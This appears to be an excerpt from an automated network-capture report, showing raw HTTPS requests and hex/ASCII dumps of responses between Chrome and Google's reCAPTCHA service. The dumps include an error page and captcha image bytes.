                                                                                                                                                                                                                                                                  2024-10-29 19:10:58 UTC1378INData Raw: 70 69 4b 31 56 46 4d 6b 4d 33 63 58 56 75 61 31 4e 57 64 47 6b 78 56 6c 52 57 55 32 30 79 62 45 4e 6d 54 58 6c 4b 64 7a 6c 73 55 6b 4a 36 4d 6b 77 78 4b 31 42 31 63 44 4a 72 4d 30 67 7a 61 48 6f 77 64 32 64 76 5a 45 49 76 63 55 78 6c 5a 6e 56 57 62 55 6c 4c 5a 54 64 68 62 46 6c 4e 64 54 49 34 53 32 4d 7a 57 6d 6c 6d 65 6e 5a 74 53 31 45 72 56 54 4a 4d 4d 6e 64 73 65 54 4e 54 61 46 5a 53 55 55 31 4b 63 45 78 6b 52 45 35 47 62 45 74 34 65 46 68 61 53 31 42 76 56 6e 68 74 4d 32 39 57 5a 6c 4d 77 54 6b 45 79 63 57 39 78 59 7a 41 78 56 57 68 43 4d 55 63 33 51 32 6c 6d 5a 33 52 55 54 6e 63 7a 56 6d 70 71 51 54 56 42 61 6d 46 49 52 55 64 36 56 30 4a 68 4c 32 4a 7a 52 57 6c 48 64 33 4d 77 53 45 67 34 65 48 46 61 61 57 52 76 65 48 68 44 55 56 4e 32 54 45 52 55 4d
                                                                                                                                                                                                                                                                  Data Ascii: piK1VFMkM3cXVua1NWdGkxVlRWU20ybENmTXlKdzlsUkJ6MkwxK1B1cDJrM0gzaHowd2dvZEIvcUxlZnVWbUlLZTdhbFlNdTI4S2MzWmlmenZtS1ErVTJMMndseTNTaFZSUU1KcExkRE5GbEt4eFhaS1BvVnhtM29WZlMwTkEycW9xYzAxVWhCMUc3Q2lmZ3RUTnczVmpqQTVBamFIRUd6V0JhL2JzRWlHd3MwSEg4eHFaaWRveHhDUVN2TERUM


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  93192.168.2.1649824142.250.184.1964437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:58 UTC606OUTGET /recaptcha/api2/reload?k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC743INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                  Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                  Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:59 GMT
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Allow: POST
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC635INData Raw: 36 38 30 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 20 28 42 61 64 20 52 65 71 75 65 73 74 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                  Data Ascii: 680<html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 405 (Bad Request)!!1</title><style>*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{backgro
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1036INData Raw: 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67
                                                                                                                                                                                                                                                                  Data Ascii: idth:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#log
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  94192.168.2.1649825142.250.186.684437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:10:58 UTC1170OUTGET /recaptcha/api2/payload?p=06AFcWeA6ybvhC6a36EKdcCTGBHKZReYQA4R_kkyWNSJTDAm7m3lFMEhYkCENSDziHiW9sRhbOJ86_Rsz2zmABWs2jn-El121Z6wW8aDnqJ4qjwO5ZcN3u6_Qzb1T_FqjH0O-Yzag-DOjDPnlRhcPtZhGPXV1TKAg9b0B7NcFkz3bKVPSKNagZW5Tfeoh0tPt_RS9jsUxjM_M1IE9oo08LmfUhCYLue86Lrw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                  Referer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=-ZG7BC9TxCVEbzIO2m429usb&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:10:59 GMT
                                                                                                                                                                                                                                                                  Date: Tue, 29 Oct 2024 19:10:59 GMT
                                                                                                                                                                                                                                                                  Cache-Control: private, max-age=30
                                                                                                                                                                                                                                                                  Report-To: {"group":"coop_38fac9d5b82543fc4729580d18ff2d3d","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/38fac9d5b82543fc4729580d18ff2d3d"}]}
                                                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: same-site
                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_38fac9d5b82543fc4729580d18ff2d3d"
                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                  Server: ESF
                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC697INData Raw: 36 39 32 33 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 01 00 01 00 00 ff db 00 43 00 05 03 04 04 04 03 05 04 04 04 05 05 05 06 07 0c 08 07 07 07 07 0f 0a 0b 09 0c 11 0f 12 12 11 0f 11 10 13 16 1c 17 13 14 1a 15 10 11 18 21 18 1a 1c 1d 1f 1f 1f 13 17 22 24 22 1e 24 1c 1e 1f 1e ff db 00 43 01 05 05 05 07 06 07 0e 08 08 0e 1e 14 11 14 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e 1e ff c0 00 11 08 01 2c 01 2c 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71
                                                                                                                                                                                                                                                                  Data Ascii: 6923JFIFC!"$"$C,,"}!1AQa"q
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: ca e7 f0 c1 fe 75 3d 14 01 07 9c ff 00 c5 69 32 8e e7 e5 3f c8 e6 83 75 08 e4 ac c0 7a 98 5c 7f 4a 9e 8a 00 83 ed 76 a7 a5 cc 3f f7 d8 a7 c5 2c 72 8c c7 22 38 f5 56 cd 3e a1 78 ad e5 93 12 42 8e c3 bb 26 7f 5a 00 9e 8a 83 ec 76 9f f3 eb 07 fd fb 14 bf 64 b4 ff 00 9f 68 7f ef d8 a0 44 d4 54 3f 64 b5 ff 00 9f 68 7f ef 81 48 d6 d6 6b 8c db c0 39 e3 e4 14 0c e1 fe 2f ae ef ec bf fb 6d ff 00 b2 57 03 e5 d7 7f f1 3e 08 55 b4 e1 14 29 1f 12 67 6a 80 48 f9 71 d2 b8 df 2f da be cb 2a 9d b0 90 5e bf 9b 3e 5f 31 5f ed 32 f9 7e 48 a5 e5 fb 50 63 ab be 5f 3d 29 4c 5e d5 e8 fb 43 8a c5 2d 94 79 75 73 ca a5 f2 bd a9 7b 41 f2 94 fc be 31 8a 3c bf 6a ba 22 f6 a7 79 5e d4 bd a8 72 94 7c ba 3c ba bd e5 7b 52 f9 5e d4 7b 50 e5 28 f9 54 79 7e d5 7b ca f6 a3 ca a5 ed 03 94 a5
                                                                                                                                                                                                                                                                  Data Ascii: u=i2?uz\Jv?,r"8V>xB&ZvdhDT?dhHk9/mW>U)gjHq/*^>_1_2~HPc_=)L^C-yus{A1<j"y^r|<{R^{P(Ty~{
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: ba 95 e4 a5 ee ef 1e e5 be 62 1a 53 e6 11 92 49 1c f6 24 9c fa e4 d7 dc df 67 f6 af 8c 16 df c0 f6 44 e2 2b ed 44 83 9c 92 79 ff 00 d0 45 79 19 a4 f9 f9 7e 7f a1 e9 e5 f0 b7 37 c8 34 3f 10 c6 9e 28 83 51 be b3 8a 54 17 02 76 8e 26 6c 06 18 c9 5e 78 39 ec 72 2b da db c5 9a 70 8d 64 85 5e 60 e3 3e 58 5c 10 3d c9 e3 f2 cd 78 8c 7e 20 d3 6d ee a5 7b 2f 0f db b4 64 00 a2 42 bb 97 19 e7 80 70 4e 47 e5 53 c9 e2 8d 5c a4 2b 0d b5 a5 a2 4b b5 62 38 2d 9c f4 ff 00 38 af 32 32 4b 73 d3 71 7d 0f 5c 6f 19 33 6a 3e 4c 7a 51 58 84 61 b7 13 b7 27 24 63 a6 2b 73 4f f1 7e 9c b1 ee b8 f3 61 70 33 b7 6e 41 fa 11 5f 3c c1 a9 f8 8b 51 be 6b 63 2d e4 5b 46 58 aa 04 00 7e 15 52 7b 7b c6 69 0d e5 f0 91 e3 23 28 19 df 20 e3 9d c7 81 d7 a5 4c ab 43 61 aa 73 dc fa 4e eb c6 da 1a a0
                                                                                                                                                                                                                                                                  Data Ascii: bSI$gD+DyEy~74?(QTv&l^x9r+pd^`>X\=x~ m{/dBpNGS\+Kb8-822Ksq}\o3j>LzQXa'$c+sO~ap3nA_<Qkc-[FX~R{{i#( LCasN
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: 8d cc ab 90 4b 1e dc 62 bd 87 c8 3e 95 e1 ff 00 b1 cc 73 ac 7e 2a b7 b8 8e 44 68 de d4 90 e3 04 13 e7 02 3f 4a fa 04 45 cf 4a f5 30 d5 95 3a 6a 2b a1 c3 5e 95 ea 36 67 7d 9f da 94 5b fb 56 8f 93 40 88 56 df 59 31 f6 25 0f 23 3d a8 f2 3d ab 49 62 1e 94 ef 24 7a 51 f5 81 fb 13 30 41 ed 4b e4 7b 56 98 87 da 94 44 a4 91 dc 75 a5 ed c7 ec 4c d1 6f c7 4a 4f b3 fb 56 af 92 28 f2 85 1e dc 3d 89 95 f6 7f 6a 3c 8f 6a d4 31 0f 4a 4f 28 51 ed c3 d9 19 cb 07 b5 7c 45 77 a3 f8 3f 50 9d 49 d7 1d 76 80 3c b8 e4 55 1c 13 d4 11 d7 9a fb bb cb 15 f1 0d cc b7 36 90 21 86 4f 28 34 b1 a1 58 e3 55 18 66 0b d8 7b d7 0e 2e ad ec 76 e0 e9 da ff 00 23 36 5d 13 48 82 79 a1 d2 85 ed cb 08 e0 91 00 2a 41 cb b8 7e 8a 38 da ab 8f c6 ba 58 b4 ad 39 36 bc 76 b7 d8 f7 75 cf d3 92 07 e9 54
                                                                                                                                                                                                                                                                  Data Ascii: Kb>s~*Dh?JEJ0:j+^6g}[V@VY1%#==Ib$zQ0AK{VDuLoJOV(=j<j1JO(Q|Ew?PIv<U6!O(4XUf{.v#6]Hy*A~8X96vuT
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: 4e 9c e5 08 c5 e8 74 41 46 7a b6 7a ac 7a a5 ab ed 0b 34 4d bb a6 18 73 52 0b fb 73 ff 00 2d 63 ff 00 be 85 79 1c 5e 33 b3 08 8d 6b 14 11 34 39 64 30 cd 80 b8 07 3c 02 0f 4c e6 92 6f 13 44 f3 45 63 63 0c d1 79 6a 5d 95 e3 7f 31 b7 63 68 07 9f 97 83 d7 ae 78 f7 b8 54 9c 95 da b0 38 c3 a1 eb eb 79 09 19 de 3f 3a 91 6e 50 8f bc 3f 3a f2 11 e3 00 b6 aa f6 f2 df 47 11 95 62 90 88 e1 66 e5 1b 8c 1c 90 7e 52 7a 71 c5 58 9f c4 f6 16 b1 b4 77 5a e5 ac 6e 1c fe f0 15 9d c0 00 70 51 10 0e 79 ef 42 ac db b2 17 24 4f 58 17 0b fd e1 51 2d e4 28 d3 48 f2 a0 50 46 49 3c 70 39 fe b5 e6 3f f0 96 35 dd 94 f2 5a 5f 5c bc 30 f9 71 ab b6 93 e4 87 2c 09 01 4b 39 27 85 6c 9c 7a 55 2b 8d 4f 57 be b6 fb 3e c9 44 6b 26 f1 1b 6d 52 4e 3a f0 01 f5 e9 43 ac d6 e5 2a 49 b3 d7 ed ef 62
                                                                                                                                                                                                                                                                  Data Ascii: NtAFzzz4MsRs-cy^3k49d0<LoDEccyj]1chxT8y?:nP?:Gbf~RzqXwZnpQyB$OXQ-(HPFI<p9?5Z_\0q,K9'lzU+OW>Dk&mRN:C*Ib
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: 8c 0a 92 f2 3d 4b 51 96 c6 eb 41 b4 d1 66 c1 63 70 cc c4 a0 e5 4a e5 4f 1c e1 b8 00 8f 61 df ac f0 57 c3 59 bc 5d 77 2d 86 b5 e2 1f ec e4 29 e6 08 74 f4 3f 3f 39 20 39 db 82 3a e3 69 e3 e9 cf 35 6c 42 73 e5 b5 df ad bf 22 a3 46 4d 5d 6c 73 56 4f a9 5f 5c 3d ad 9e 9f 08 9a 08 91 1b 0a 04 88 bb 40 53 d8 fd d6 eb e8 de 86 a8 6a 3a c5 e3 eb 1e 44 97 17 77 b3 2e 33 25 84 5e 76 dc 05 51 82 31 ce 31 d3 d2 bd 17 51 f8 6f a3 f8 3f 5a 36 cb 14 d7 20 7c d0 5c 4f 21 66 64 e9 ce 30 33 c6 0f 1d ab d0 3c 37 3f 87 75 ad 3a 2d 0e f6 c6 d3 4d b8 41 b6 de 6b 68 96 25 27 d3 00 00 0f b7 43 ec 6b 9b db 37 26 95 97 cb f5 77 37 fa b7 ba 9b 67 91 58 f8 3f 5b fb 1d 95 c5 f6 83 7f 6f 6d 38 56 79 6f a7 2b 12 8e 78 da 83 70 3d 3a fb f1 5d 66 8b e0 48 15 67 cc d1 6a 31 4a 0e d4 d3 59
                                                                                                                                                                                                                                                                  Data Ascii: =KQAfcpJOaWY]w-)t??9 9:i5lBs"FM]lsVO_\=@Sj:Dw.3%^vQ11Qo?Z6 |\O!fd03<7?u:-MAkh%'Ck7&w7gX?[om8Vyo+xp=:]fHgj1JY
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: a5 29 4b 72 d4 54 76 25 09 81 c9 fc 31 4b bc 28 e7 15 04 93 e7 93 cd 53 b9 ba 7d eb 0c 2a d2 4d 21 0b 1a 28 c9 62 7a 0c 52 48 1b 2f c4 97 3a 85 fc 5a 7d 8a 79 b7 33 9d aa bd 80 ee 4f a0 15 bb e2 f9 ed bc 3f a4 c7 e1 3d 31 c3 48 71 26 a1 30 ea ec 79 db fc 8e 3d 30 3d 6b 4e ca de 0f 87 fe 17 7d 4e f7 64 ba e5 e8 da 8a 79 da 7f ba 3d 87 53 ea 70 3d 2b ce 24 9e 49 e6 92 79 e5 2f 2c ac 5d d9 8f 2c 4f 53 5d 4a 3e ce 36 ea ce 77 2e 77 7e 83 f7 00 3d 2a ac ed cf 15 60 67 67 5a a9 36 0e 39 04 1a 91 93 db be 3b d7 ce 7a 3f c3 fd 42 f8 06 79 2e ae 97 d6 15 f2 e3 ff 00 be 9b 02 be 85 85 c0 ff 00 f5 d6 65 df 8b 3c 23 64 4a d8 e9 9a 8e b7 30 18 f3 2f 25 fb 3c 59 f5 08 9c 91 ec c6 b6 a5 7d 6c 65 3b 75 3c fb 41 f8 69 12 ba c4 21 b7 59 b1 f2 c7 1c 66 e6 53 fe 7d ab bb b6
                                                                                                                                                                                                                                                                  Data Ascii: )KrTv%1K(S}*M!(bzRH/:Z}y3O?=1Hq&0y=0=kN}Ndy=Sp=+$Iy/,],OS]J>6w.w~=*`ggZ69;z?By.e<#dJ0/%<Y}le;u<Ai!YfS}
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: a7 a0 3a ea 0f d3 cb a8 35 df 8a fa 86 8f 60 2e a6 f0 ee 9f 32 33 00 04 3a d0 76 3e f8 f2 ba 56 11 d0 f4 82 50 b6 9a d9 43 90 43 91 fd 79 ac 1d 47 c3 da 4a de 39 96 cf 59 68 a4 73 e6 6c bb 53 1a a1 e7 e4 52 84 a9 c8 1d cf 19 ae ca 52 a3 37 6d 3f af 99 86 3b 24 ab 85 a4 e6 a9 b9 7a 5f 4f 3d 8d c9 7e 3c 4f be 48 a6 f0 89 86 54 62 ac ad a8 74 20 e0 ff 00 cb 3a b3 e1 3f da 46 d7 c3 7a bc 97 f7 5e 04 fe d2 ba 0b 88 99 b5 6f 2c 47 ea 40 f2 4f 3e f5 e5 be 3d 71 77 e2 dd 56 ea de 2c 43 e7 90 18 63 0d 8f 97 70 c7 a9 19 ae 32 ff 00 fe 3e 9b e8 2b b9 51 a7 17 74 8f 91 94 a7 6f 78 f7 df 15 fe d3 37 7e 21 d6 1a fe e7 c2 7b 10 0d b0 c2 35 2c 88 d7 d3 3e 57 27 d4 d6 72 7c 7f ce e3 ff 00 08 9f dd 00 ff 00 c8 47 df fe b9 d7 86 03 4f 8f 84 94 ff 00 b2 3f 9d 3f 63 06 ee d1
                                                                                                                                                                                                                                                                  Data Ascii: :5`.23:v>VPCCyGJ9YhslSRR7m?;$z_O=~<OHTbt :?Fz^o,G@O>=qwV,Ccp2>+Qtox7~!{5,>W'r|GO??c
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: b2 95 da ad ed f3 b1 c1 f5 07 b5 7b 15 da bd e6 9d 35 bb 48 8a 66 8c a7 04 0c 64 63 35 e4 f7 5a 7a 58 68 37 da ac e5 44 77 de 1e 8e 22 42 e7 0e a1 53 9f 7f bc 41 ff 00 eb 56 75 62 d3 34 86 a7 9f 6a f1 6a 5a 57 85 34 fd 51 6f 64 44 79 d9 82 80 11 91 c3 14 18 20 e4 8f 97 db 90 47 3d 6b de 3e 12 78 82 ff 00 57 f0 aa 9b 99 3c d9 a0 3b 44 b2 b1 2c 72 33 8c 9c 9f 5e 2b 84 f1 37 85 ae b5 3f 86 32 41 62 de 79 81 53 99 00 2b e6 ef e7 ca 23 a0 1b c9 24 f1 d7 be 6b d2 bc 13 6d a4 68 1e 1b b6 87 4f bb b0 6b 71 0a ee b8 12 a9 59 58 0c 33 6e cf 3c 8a ca 85 2e 49 5d 75 2a ac 9c 9d d9 e6 3f b5 07 89 20 d1 db 40 37 91 4b 72 65 fb 4e dd bf 26 dc 79 59 ce 7e a2 bc 28 fc 52 d0 94 90 34 f9 c9 1f ed ff 00 f6 35 eb df b5 45 a5 df 8e 7f b0 2c bc 28 13 55 b9 80 dc 89 9a 27 50 90
                                                                                                                                                                                                                                                                  Data Ascii: {5Hfdc5ZzXh7Dw"BSAVub4jjZW4QodDy G=k>xW<;D,r3^+7?2AbyS+#$kmhOkqYX3n<.I]u*? @7KreN&yY~(R45E,(U'P
                                                                                                                                                                                                                                                                  2024-10-29 19:10:59 UTC1378INData Raw: ca 77 15 66 63 96 42 08 20 1d a7 bf a5 67 7c 49 f8 67 a7 4b e1 d0 7c 3d 3d 89 bd 8d d1 5d 25 91 15 82 a2 ec 09 bd 9b 0a 06 33 83 df 34 94 e3 7b 49 6a c9 85 17 28 f3 9c ce 87 e2 7d 29 8f d9 ee 21 58 9d 8b ef 53 c7 96 4b 76 6c 77 cf de 20 d7 45 60 da 64 17 10 48 2f e5 fb 2b b8 49 93 7e f9 14 16 e5 b1 ed 9f 4f ce bc 96 cb 4d 8a 21 3b de b3 48 22 04 1f b3 ca 08 2d f3 0c 86 19 1d ba f4 3f 8d 76 be 04 90 ea 3a 6a 44 23 59 a7 49 0c 3e 62 28 66 61 b3 7e 4e 06 3d 3f fa dd 69 49 2b b7 b9 93 8f 2e c7 a3 78 3f c5 12 69 57 7b 6d 6f 16 c1 6e d9 90 dc 47 18 13 08 c1 c6 54 64 8c 90 3e f7 bf 15 ed 3e 05 f1 e3 ea ed aa 3d d5 83 5c c7 1d c2 8b 79 3c bf 91 54 a2 e5 49 e4 e7 3c f4 ef 5e 17 6b 05 d6 90 d3 eb 6b a0 46 b2 40 89 0d b5 bc ab bd 59 d9 f9 cb 60 05 07 76 ee 0f 07 f5
                                                                                                                                                                                                                                                                  Data Ascii: wfcB g|IgK|==]%34{Ij(})!XSKvlw E`dH/+I~OM!;H"-?v:jD#YI>b(fa~N=?iI+.x?iW{monGTd>>=\y<TI<^kkF@Y`v


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  95192.168.2.1649826142.250.186.1644437056C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC838OUTGET /recaptcha/api2/payload?p=06AFcWeA6ybvhC6a36EKdcCTGBHKZReYQA4R_kkyWNSJTDAm7m3lFMEhYkCENSDziHiW9sRhbOJ86_Rsz2zmABWs2jn-El121Z6wW8aDnqJ4qjwO5ZcN3u6_Qzb1T_FqjH0O-Yzag-DOjDPnlRhcPtZhGPXV1TKAg9b0B7NcFkz3bKVPSKNagZW5Tfeoh0tPt_RS9jsUxjM_M1IE9oo08LmfUhCYLue86Lrw&k=6LfT61wqAAAAAOLaMTaK9Ln8bjdWJ8-ahQ3zE9AF HTTP/1.1
                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                  X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                  Cookie: _GRECAPTCHA=09ANOXeZyZWgCKLdw5-kFS0gUANBm5Va1EN26B9hfC56KI4QhhLjdW5njibFBDQAH_dwZx17Q4rEBsJMB-Ste7v8o
                                                                                                                                                                                                                                                                  2024-10-29 19:11:00 UTC681INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                                                  Expires: Tue, 29 Oct 2024 19:11:00 GMT
